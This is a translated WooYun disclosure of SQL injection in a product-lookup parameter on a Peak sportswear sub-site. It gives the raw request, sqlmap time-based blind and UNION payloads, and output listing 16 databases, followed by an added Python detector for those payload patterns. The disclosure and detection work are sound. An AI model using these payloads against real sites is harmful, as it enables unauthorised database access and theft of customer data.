Vulnerability summary

Defect ID: wooyun-2015-0125980

Title: SQL injection in a Peak (匹克) sub-site, no. 2 (16 databases)

Vendor: epeaksport.com

Author: 天地不仁 以万物为刍狗

Submitted: 2015-07-10 18:34

Fix time: 2015-08-27 09:46

Disclosed: 2015-08-27 09:46

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Vulnerability details

Disclosure timeline:

2015-07-10: Details sent to the vendor, awaiting vendor action
2015-07-13: Vendor confirmed; details disclosed to the vendor only
2015-07-23: Details disclosed to core white hats and relevant domain experts
2015-08-02: Details disclosed to regular white hats
2015-08-12: Details disclosed to intern white hats
2015-08-27: Details disclosed to the public

Brief description:

Heaven and earth are not benevolent; they treat all things as straw dogs.
[HD] In the name of the team, for the honour of the individual, building network security together.

Details:

POST request:

POST /XP001-Shopping/dialogSales.html HTTP/1.1
X-Forwarded-For: 8.8.8.8'
Content-Length: 67
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://team.epeaksport.com/
Cookie: PHPSESSID=i532srvsrtg0ml6ui0icdfegc4
Host: team.epeaksport.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
productCode=E42638H


The productCode parameter is injectable.

[screenshot: 0.png]


[screenshot: 1.png]


Checked the database privileges.

[screenshot: 2.png]


Picked a few databases at random and enumerated them (the epeak database is still slow to dump).

[screenshot: 3.png]


Looked at a few of them; not sure what these databases hold (many row counts could not be retrieved).

[screenshot: 4.png]


[screenshot: 5.png]


[screenshot: 6.png]


A pity the row counts could not be retrieved.

Proof:

POST parameter 'productCode' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 112 HTTP(s) requests:
---
Parameter: productCode (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: productCode=E42638H' AND (SELECT * FROM (SELECT(SLEEP(5)))kUqy) AND 'Uttm'='Uttm
Type: UNION query
Title: Generic UNION query (NULL) - 19 columns
Payload: productCode=-8846' UNION ALL SELECT NULL,NULL,CONCAT(0x71716a7871,0x53705a66686355414941,0x71707a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
[18:16:23] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[18:16:23] [INFO] fetching database names
[18:16:23] [INFO] the SQL query used returns 17 entries
[18:16:23] [INFO] retrieved: information_schema
[18:16:23] [INFO] retrieved: epeak
[18:16:23] [INFO] retrieved: epeakanalyse
[18:16:23] [INFO] retrieved: epeakassist
[18:16:24] [INFO] retrieved: epeakmall
[18:16:24] [INFO] retrieved: epeakmall_e
[18:16:24] [INFO] retrieved: epeakmall_team
[18:16:24] [INFO] retrieved: epeakmall_xf
[18:16:24] [INFO] retrieved: epeakpdm
[18:16:24] [INFO] retrieved: epeakpdm_e
[18:16:25] [INFO] retrieved: epeakpdm_team
[18:16:25] [INFO] retrieved: epeakpdm_xf
[18:16:25] [INFO] retrieved: epeakuniform
[18:16:25] [INFO] retrieved: epeakvip
[18:16:25] [INFO] retrieved: mysql
[18:16:25] [INFO] retrieved: performance_schema
available databases [16]:
[*] epeak
[*] epeakanalyse
[*] epeakassist
[*] epeakmall
[*] epeakmall_e
[*] epeakmall_team
[*] epeakmall_xf
[*] epeakpdm
[*] epeakpdm_e
[*] epeakpdm_team
[*] epeakpdm_xf
[*] epeakuniform
[*] epeakvip
[*] information_schema
[*] mysql
[*] performance_schema
[18:16:26] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 9 times
[18:16:26] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\team.epeaksport.com'
[*] shutting down at 18:16:26
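Added example, not code from the report or from the vendor: a small Python detector that scans request bodies and headers for the two payload shapes sqlmap used above (SLEEP()-based time-blind and UNION SELECT), plus a stray quote in X-Forwarded-For. The sample requests are constructed; the product code and payload text are taken from the report, and the IP addresses are placeholders.

```python
import re
from urllib.parse import urlencode, unquote_plus

# Signatures for the two techniques sqlmap reported against productCode:
# time-based blind via SLEEP(), and a UNION query; plus the quote-equals-quote
# tail ('Uttm'='Uttm) that closes the time-based payload.
SIGNATURES = {
    "time_based_sleep": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "quoted_comparison": re.compile(r"'\s*=\s*'"),
}

def decode(value):
    """URL-decode twice so a double-encoded payload is inspected in clear."""
    return unquote_plus(unquote_plus(value or ""))

def inspect_request(req):
    """Return signature hits for one request as 'signature@location' strings.
    Headers are scanned too: the report's request carries a stray quote in
    X-Forwarded-For, which a filter that only checks form fields never sees."""
    hits = []
    fields = [("body", req.get("body", ""))]
    fields += [("header:" + k, v) for k, v in req.get("headers", {}).items()]
    for where, raw in fields:
        text = decode(raw)
        for name, pattern in SIGNATURES.items():
            if pattern.search(text):
                hits.append(f"{name}@{where}")
        if where.startswith("header:") and "'" in text:
            hits.append(f"stray_quote@{where}")
    return hits

def flagged_requests(requests):
    """Indexes of the requests that triggered at least one signature."""
    return [i for i, r in enumerate(requests) if inspect_request(r)]

# Constructed sample traffic modelled on the report: one normal lookup, then the
# two sqlmap payloads quoted in the proof, URL-encoded as a client would send them.
UNION_PAYLOAD = ("-8846' UNION ALL SELECT NULL,NULL,CONCAT(0x71716a7871,"
                 "0x53705a66686355414941,0x71707a7871)," + ",".join(["NULL"] * 16) + "--")
SAMPLE_REQUESTS = [
    {"body": urlencode({"productCode": "E42638H"}),
     "headers": {"X-Forwarded-For": "203.0.113.5"}},
    {"body": urlencode({"productCode": "E42638H' AND (SELECT * FROM (SELECT(SLEEP(5)))kUqy) AND 'Uttm'='Uttm"}),
     "headers": {"X-Forwarded-For": "8.8.8.8'"}},
    {"body": urlencode({"productCode": UNION_PAYLOAD}),
     "headers": {"X-Forwarded-For": "203.0.113.5"}},
]
```

Feeding `flagged_requests(SAMPLE_REQUESTS)` the constructed traffic returns `[1, 2]`; the benign lookup of E42638H is left alone.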

Fix recommendation:

Copyright notice: when reposting, credit the source: 天地不仁 以万物为刍狗@乌云


Vendor response

Vendor reply:

Severity: Medium

Rank: 10

Confirmed: 2015-07-13 09:45

Vendor comment:

Thanks.

Latest status:

None yet.